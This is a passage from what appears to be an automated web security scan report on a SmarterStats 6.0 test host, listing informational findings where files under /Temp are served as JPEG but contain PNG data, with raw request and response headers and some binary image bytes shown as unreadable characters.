Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:34 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEAA8BB00"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG

10.19. http://vulnerable.smarterstats.6.0.host:9999/Temp/47b58eea1f494809bf127e28495c2dd7.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/47b58eea1f494809bf127e28495c2dd7.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/47b58eea1f494809bf127e28495c2dd7.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:34 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEAA8BB00"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG

10.20. http://vulnerable.smarterstats.6.0.host:9999/Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BE11F5300"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG

10.21. http://vulnerable.smarterstats.6.0.host:9999/Temp/53bea176ee1943dd981fd05e032eff33.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/53bea176ee1943dd981fd05e032eff33.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/53bea176ee1943dd981fd05e032eff33.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682C7F131D80"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG
..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.22. http://vulnerable.smarterstats.6.0.host:9999/Temp/56dd80bb97d8414fbcfd594ed4282909.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/56dd80bb97d8414fbcfd594ed4282909.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/56dd80bb97d8414fbcfd594ed4282909.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 10264
Connection: Close

.PNG

10.23. http://vulnerable.smarterstats.6.0.host:9999/Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:12 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB9C88600"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG

10.24. http://vulnerable.smarterstats.6.0.host:9999/Temp/5bf056fa42644067bd0099f9d59829e2.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/5bf056fa42644067bd0099f9d59829e2.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/5bf056fa42644067bd0099f9d59829e2.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 14400
Connection: Close

.PNG
".7.a..=...c%.......VF..|f..]s'wC.[.......&N.*q.'..g...qrm%.......VV.h...e..j._+q..F...#.Y).q.\[I.e ,.....4N.~..|n)wS.Z.......%N.*q.'..g..g....^...C.......e%.......Vf.x...../f.....LV....%q.P..8q.8+...8.....-...j%.......Vf.....e..j.O+q..E...#.Y)..'.M..c..J.-.=9/......=0......V&.:...,N\...8q.8+.<cNm....<....A.(2l+./IekI.....+9/.............n.3..YyV|.v..C%N...........".#..J.-.?9/.....>l..V..lVud.{.'...I.8...b......[..r^.Z.A.....`..._V....8..G..R..8..j.`;6....|}.Z.a..4...<.Z...."h.I.M.u..`U7F...5&.X.....1/X...O}....t..XO.c.....mn.,[=c...............|......l..P..y9D.U...../Z...U...8qU!N...................Xj..l%..J..2\K..T8......!...f.^8..}?...u.t.RU.....U.JW..[..W..$N.....1.N....#.,i?.5.U..m..Zn.Z...2_i..`.........`33;..K%....*h.q.AU...r.g.'..8..G..j.`.f.0.GxZ.....).b.V...n.d8.6.TY@    ..`_..e.b..........@.._........?Q..O.....@N.h.`..I......%...f.^..#.00..&..!.>lj.-@.S...W......M.P...Q..|(?{.....'q..pV..l..2.*...Q..5.2l........:&U..>...Ns..    .f+...U.EOuyq.p..8q.8+.<p.6..t.(.'.(...$...+.*i@......9...Q...U.b....q.jA...#.YI..G......`.(.YwN....9..R.Vr^.y.Aca.....]..VlU5...O_^.8T.$N...J1/<../....Z....L..z.....C.....{...S.Wh...
.O_Z.8T.$N...J1.?Z..4...Z.a...g+9/W;>..S...C....p.V>........C%N.......:.Nn4..lZ./[.....*.t`3k.M.Kb..q.U......C......Xq.Z..8q..I.8...b....U...u..._..1.%h|..c..O..n."+_XUT|......'q..pV\...E..h..A..`......Q.M..\..i%....8..p....K..|f6......V>3....WC.$N.....y.........~^..D\+.a?t.^sc.&.~.8...T.......a...ekwJ.............O...$.FW...C%N...1o.c~4..~.;....I..+M}.*.l%.%Zp..w..o.&...a.....X..^....8..G..J....[....]....L....l...JS..]...........-.n:.K........)h.>..'V>..8q.#N.........~..=.4c.g.."..}...5..B..]....:]K...TV.l.....g..1x.....GF.'q.jF...#.Y.1/".p..f....6}2..J...?."....LY.+.lYn..ch...f+.............I..o...$.FW...C%N.'*.........|.8.!|.$.....d....1...lY..`.@.r...m.!>>.1.........7F..q.jE...#.Y11......!a.?5...Ni..`.
.J.....jqwU.`...i....>._.....G..'.V.I.8...#..3Z-Ln...P..
..H.S..P.
.[    .r|    W....K?..A...h..i...O..a.kC....'.......69....V...L
.~...[.Gp...n..C|}..8..WV...8q5"N.......8N..*.l.5D{#C].......T_...kX..S}......>.>....q.'..g...qrmU.`.E.7.W..N..a.m9gv..    ..z..[...V...M... ..P..4|.|.3+.....'..8..G..R...Y[\.....m
..@.QMoU.`.....Z..;.n....Y.|..<.=.......?.~{=.......y...~.s..2UX....gV.0.....'....{.qR..8...C..Ji.K..n.1..=Cv-.?.~.x9/...?..,...}.|g..#    6...O.+q.8).q.\[y"....Er.b.&.M.l...h.a.6..y9...ax..O.O_}.+.c+.Y9.>}zq.P..8q.8+.<p..r.k.]\/.....B......)4$.....$...#..FZ..jx .Uo.'??b......'.........| ..$..b.......x.L.[.h.@..;J4I..I4...w.:...e.A.X...2>.'..8..G...`..*..6S.`.[K..6.A
...\..t..].....A..1_<Q.....Sff..E.=....*u... N.Tq.'..g%.....>d.F[.a...P.....)D4.G...NV...........0.....*....8q5 N.....$.:.z..........j~....TVr^.W]...].3...0W(GVua....i..C%N.......8N..$.2...r...4|X......wg%N.[q.'..g.....f...!j...........V..qx..fn..\..X........'..8..G..R..r
F..V:..c+s.`.@[..A.S..z.A.Xq...J.8..$N...J1..4UwZ..6    ..........*........[...T...#.Y)..e...Q.a.V.l.(.y9hu..U.>..+.....'..8..G..R...tj.m.&R.a..."+9/..nA....uc.y@.V..1.'q..pV.y.....H.a..u.J..A.c.8.....}....hUGV...>.8q..I.8...b^....-S.0GV.l...y9hu...f.3......@.:.*......C%N........9.zT.D9...J...E]...O.m.|1... ...*...i..C%N........8i.6.{*...r.P..Q......<.8+q.X..8q.8+.<..k+5.f ,....5h\.4o.<~..y.2W.........:.8q..I.8...b^..bsh..|.i.....l...X.y9hu..e.>.3+.....'..8..G..R......A.).+.._.zp^T....._...>l..V.VgVe1.u...-N.......B...F........\V..e.'....=h.9....8..o%N.Cq.'..g....4.....q..ZI.e (....=h`>64.....U...a.)..8V..qR..8..j.`;6..,.0.c..w,_...M........?.1.`..;V@p....k>......'q..pV.y.'.V..ls3fYG...[.~.....7.Wo3..8.r^.S...'.<l0....    .\3R..',.X...I1.....%.mQ.M..    6d..Y...Q....[6.ax..l.es.5..kF.l<a...J.8N.y.'.V..l=16.,.L.3.}zz..Q.^............w........@+}@.......|.....3..x..lI....s5...........
...).2..>L.8T.$N...J1.......-<...0@?65..v.f...fQ4....`9..$N...J..q.`.8..j.`...n...t0kV-......I.C...6.U.~.>.8qt.I.8..U:.....g._.\jv..-x%-..d.v?W.zZ.W.u.K.z.u.&....6..K..'..8..G.....V..0.    .... ...O.k'.......V..l.U....]...iZ..h.C..w.9....r..sRq....8q.8+............j....$.......J.-C.q....;.iA....Mc.....#+N......fK.~..0...l..O[.....q.6i.s.....[...`..51h.....<...h..j".".D.!N.Uq.'..g...I.qT.[I..g....m<.&.WS|4..x.Io!N.3q.'..g....I....J.-=3    6.YS....o/|}..."].6.'..8..G...#.......q..B6I.2...V++    .....y3\.!.45h.......veq....8q.8.t1o0..+.O.1.....C.z..H......t....9..A....MeU.+..GT...#.Y..y....)..d.! ...\9o.[...&..O^y. .V..dVE1.y...)N.........4 .S..* .....8o.....&.....h2.".T.8..$N...J1....J.-.a9/...A..sK...op0.X5.U!..a.1..8T..qR..8...`.@X..Ak....)>......V.4..,.I.8...b......[..r^.Z....'.2.sG8 #...*7$    .....C%N.'.<..k+    .......6<......8..m%N.Eq.'..g...qrm%..........q..e.w...'.m.+.k$......9...8).q.\[I.e ,.....aXD..-.8.I..'..8..G..R..8..j.`.7.W.7w,...M.........t9.8B....4..H.-.8..`.........8).q.\[5^.A.-.0..87c.-.f6...w.....u..    .r^.R...h..HW.C>.....O.......8N.../.......\4..~?
...s.6....N.}...-..&VY..c...'N.......8N...%..a[=c.u.F..............mA#O..m.8....'..8..G..R..8..j.`..Cm.('.....5....^b......3.~.../..........l...w.v...X..5.r........=..
.i.6.J.....Q.'q..pV.l.'.V..l1b-.:........r^.RK.k.E..`.S...J.$N...J1.......m.......cIH.iZ.......%..VVi=P.8b.$N...J..........@9/G..A#K....8O.[..GL...#.Y).q.\[I.e ,....9h.......M]+q.h..8q.8+.<..k+    .......6...Y.6...I.M....l...8).q.\[I.e ,.....a.&..vV.G).&N,..N.....-.    ..1......H..l.hJ.q...0L.ek;+..$...%...{7.........V.....^......1l.M..S...J.$N..d+....[^.../.......MA..d....g...b%...pV.'q.......g....9.....O.m......J..%..^.-.[    6...F.....X..8....I.F.X.;b....<..........C.n.l./.a%.......MA......f..;Gf..J>.....O.d    \.4oN.~.|...3..^........]A&.5d...[.n...c.....U..$.2..`..)h.9..._.I.X..8........?.
...M..?.!..>.4.l...........{    ..\...4..>'t.....gfc...|.#.Y....    M._...|...^.&.h.q87....G.o......{    ..\...4..AN..n.F..mb%...pV...qB.3..O_},h.D.2...X.h.....H.R..K...%.2p..r..4.9%M.!V.)..g%.7'.3....;C3...>.4m..)..I;.Z.l..A..AS......h...#.+..G...?....512.f.0.....q....G..R..8...`.@X..AS...d...?.+..G...?..    .1|...,.....6sf'..JP..b^9..]E.m.......4..dN..Q..Oq..Y..r!..-.v....";.........D...a.g...y.V1/....m.`;6....|}.Z61OS..r.\=....m..Qt.._lb...8..d.{....?..B..;.....I..i..4..}....1oario....G.\d/....mn.,[.....e.l^..l....u^.l..Rp.].W...2.z.t....P.n^.4..../[D`....@(._...l...`pQ.i....fK+.0..^v..5..I3/?*...h..x..
.v..>....?...J..o.`Cv-.U.............`...i....5."/.8...<......=...{..i^v9.h.....D..$.`g.......T.$..0...f.}..8..#3.(C..v.7..Xa.e.Z_Y../&.!....E....>.O@..2..i.l..O.c.8/u...I.....Bd...e. o;f.)...8...<N...X.....>..X.._.sWsf..'.WRY.X..|..=..>....A<&.. b.g.    _3....L+..kj...T..21oH..z...2U....l.l#....t ....^x.|....K.......|..>.......q....{5)...XM..;.........6#.V._[<.qJ......eG..,j~.z:.-.f.IM......b`...Y...t.g...5..+...J.u.g`Y..u..5_p.n...tS.FQ.w..Aq*.....)sx...pty..
.....z.xe)." ." .. .i=..s...[.:............C@....:...........8# ....N,." ." ." ....`+..."." ." ." ...H.E..Xg.....k..g.ky..;.....;.k`..En...r..X...._...3.....V..W......7..
>.r..xh.....c|..e.Q.....g{....Wme.:..0...=..k...`.T.f...LX.!X(.. ....C...weG..
.....S.5.....;:~.Rl.8[.....%"..Un[X...-e......e....J...4.....`.H...e._.._.._........gR.-Z...;.2#._Z;...._.!..6^....nI>.c....+...}a..F.U.[......|Mf6..z.O.<
..Q..;.x~.Q."...3..p.b....2....Nv`.2.m..y...l...v.E.Q.-.Z..yR.....bw....,..o..~.m......M...=(...Q...J.f..Y(.J..vP.EA..o....,..}.....om."I....k...v....b.Y..QH..Q......l........r>.r...6....~U..b.`.f...f1....~....i0..b.d?BA9.zo..>.`C.)....i[.?aaj}    ..EO....k.`..=....-.'..?l..f....6|.rI.b..`....9D..M..q.d'.=...6,......`[.....`_.qnZ...,....j.....n.oA.......S....B.-~ J[.g.C......m..=.S..K..a.5g.&.......'%Vdi...b.. ,v...D.2......%6_Ya.....!6..../.w..Q..E.........\.$...q?.z....U.}(.......PB...h....n.o#4..ZK...(.G..I.E ....N...(.D
..a.j..e.(/......./. .4..h2n....r......f..?...kp4v...lZ....i.Ar.?...`Qk.    .......]...p.]].....Xt..H...Z............l.$..q.Q" ." ." ."P..    ..P.B" ." ." ."....[6n:J.D@.D@.D@.J# .V.j]H.D@.D@.D@....`..MG..........@i.$.JC............@6..l...(..........(...[i.u!...........F@.-.7.%." ." ." ....`+..$." ." ." ...H.e...D@.D@.D@.D.4..l....D@.D@.D@.D ..    .l.t............F...............IEND.B`.

10.25. http://vulnerable.smarterstats.6.0.host:9999/Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:31:53 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BAE755A80"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG

10.26. http://vulnerable.smarterstats.6.0.host:9999/Temp/610228c0ba7b4ab6803b2930991bc819.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/610228c0ba7b4ab6803b2930991bc819.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/610228c0ba7b4ab6803b2930991bc819.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:06:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB697FB9D99A80"
Content-Type: image/jpeg
Content-Length: 7789
Connection: Close

.PNG

10.27. http://vulnerable.smarterstats.6.0.host:9999/Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 9648
Connection: Close

.PNG
Y..^e-Q lj.s.H'...@.......-O...6O'.U...g..~.*ly.a...........vP...y..#..k#l.e2..UW..q..F..O..{+.....!lO...L.O..P.-O l.....,.:+G&...c5`......Z.....s.m{R...[..n\...}^....vU..D..    .r.SXX......w{5..|x.+/l{..&m'.[......G.Wv^.a{|..L!..5./%Q0aS:|...Lg.....b...c...0_ya.k.].J."...s.m....rss.49;)Z..M..W.-S.mZ..O.(...mi..h...p.kX....Y..........G.U.+l.h...=../.L.O.nW.-O0a....KXg.....b...c...0g..>.9.T...=...U.2..l.U.-O lJ.sJT....@.c.V..J...s.....m.w.E...B_"l_...*..5qD....Maa.Y92......../G6..V..."...c^....!l....L!O.....$
.mQw....Ug.....b...c...0_.a;.].'.....@....../.L.............=,..j0.....V...>&C.Z.^5:...Q&Yk....o.    [.`..w..3..#......0..rd.|m...>..=..QU.2........,...1x...    ...a~.|n......j.a{}..D!..[..D..M.!.:+G&...c5`.....9.6G..5z..#..e
].n[.-O lr......%....c...C.,.0G.,...A...aK$kM..6...@.N......1R...Z.\.#l.N.....G..K%S..._...<...M^.XXuV.Lx;(.j.<...s...Gr..K.U.o...(.6...6..%....c...C.,.0G.,...A."...U.....v9.6..'....c.
.#.<.0G.<.$V.!l...D3.|J.-....'.6..9%..2er 3....y..).......2]...*l.B..7WYK.....-..Ug.....b...c...0G..}$..!l....)ta..*ly.a...a.QY29.Y0...<....s...Hj..-...D....aS..    .N......1R...Z.\.#l.N........K%S...[.    [.@..&.i,.:+G&...c5`.....9...#.........KI..............1T..!\.d.#l.FR......    [..'l.d..#..v9.6..'....c.
.#.<.0G.<.$VA.".._...<...M.)Q..)...    d.....L.0G.L....!l.~..%S...7...D..i=..XXuV.Lx;(.j.<...s...Gr..F.....Z.G.Mns.MGe..@f..*....K2..6K#.Ez...u..).    ./.    [.@...g....dr .p.T.y..'.......*]...U....l.P.-O lb.sJT.e..@f..(...,S*..6S+iez.....e
Y.....(.6..[......    o..X..x9.a..9.H....>.v..U....&.9....dr .`...y..%......."=...u..).    ..Wa......L.tR.L.d...*0......a.t.X....G..D!.....%
